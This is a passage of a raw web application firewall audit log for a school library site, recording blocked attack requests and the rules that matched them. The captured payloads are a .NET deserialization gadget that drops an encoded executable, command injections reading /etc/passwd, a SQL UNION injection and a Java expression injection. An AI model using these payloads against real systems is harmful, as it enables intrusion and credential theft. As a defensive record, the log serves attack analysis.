"COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748283281121781 2971 (- - -) Stopwatch2: 1748283281121781 2971; combined=2219, p1=247, p2=1918, p3=17, p4=18, p5=19, sr=47, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --845c741a-Z-- --d56d3641-A-- [27/May/2025:01:14:41 +0700] aDSvkVSmKJQK-9oQ9STirQAAAII 103.236.140.4 55888 103.236.140.4 8181 --d56d3641-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940714 --d56d3641-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --d56d3641-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d56d3641-E-- --d56d3641-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283281124744 9774 (- - -) Stopwatch2: 1748283281124744 9774; combined=8563, p1=279, p2=8264, p3=0, p4=0, p5=20, sr=51, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d56d3641-Z-- --f3cf444b-A-- [27/May/2025:01:14:52 +0700] aDSvnM-W3hHsdQpQwdTG1gAAANg 103.236.140.4 56242 103.236.140.4 8181 --f3cf444b-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159435959 --f3cf444b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f3cf444b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283292119182 2220 (- - -) Stopwatch2: 1748283292119182 2220; combined=903, p1=353, p2=528, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cf444b-Z-- --286d6156-A-- [27/May/2025:01:14:55 +0700] aDSvn_7lSIOiZEhmvSznwwAAAFI 103.236.140.4 56344 103.236.140.4 8181 --286d6156-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168940734 --286d6156-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --286d6156-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283295106740 4244 (- - -) Stopwatch2: 1748283295106740 4244; combined=2576, p1=557, p2=1993, p3=0, p4=0, p5=26, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --286d6156-Z-- --cbce6e21-A-- [27/May/2025:01:16:20 +0700] aDSv9P7lSIOiZEhmvSzpKwAAAFM 103.236.140.4 58796 103.236.140.4 8181 --cbce6e21-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 159436013 --cbce6e21-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --cbce6e21-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbce6e21-E-- --cbce6e21-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283380120494 2274 (- - -) Stopwatch2: 1748283380120494 2274; combined=685, p1=401, p2=255, p3=0, p4=0, p5=28, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbce6e21-Z-- --7009566b-A-- [27/May/2025:01:20:15 +0700] aDSw31SmKJQK-9oQ9STmMAAAAIY 103.236.140.4 37408 103.236.140.4 8181 --7009566b-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 159436022 --7009566b-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --7009566b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7009566b-E-- --7009566b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748283615109485 2245 (- - -) Stopwatch2: 1748283615109485 2245; combined=1422, p1=376, p2=1023, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7009566b-Z-- --65dab704-A-- [27/May/2025:01:25:42 +0700] aDSyJv7lSIOiZEhmvSzwVQAAAFU 103.236.140.4 46638 103.236.140.4 8181 --65dab704-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 40.85.132.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 40.85.132.91 X-Forwarded-Proto: http Connection: close --65dab704-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65dab704-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283942776369 2376 (- - -) Stopwatch2: 1748283942776369 2376; combined=940, p1=344, p2=568, p3=0, p4=0, p5=27, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65dab704-Z-- --eb37861e-A-- [27/May/2025:01:26:23 +0700] aDSyT3FOzWd_Ai7zJXUfSwAAAAY 103.236.140.4 47742 103.236.140.4 8181 --eb37861e-B-- POST /account HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 100 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940803 --eb37861e-C-- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=tlgmy --eb37861e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb37861e-E-- --eb37861e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /account"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283983104122 2069 (- - -) Stopwatch2: 1748283983104122 2069; combined=643, p1=413, p2=200, p3=0, p4=0, p5=29, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: 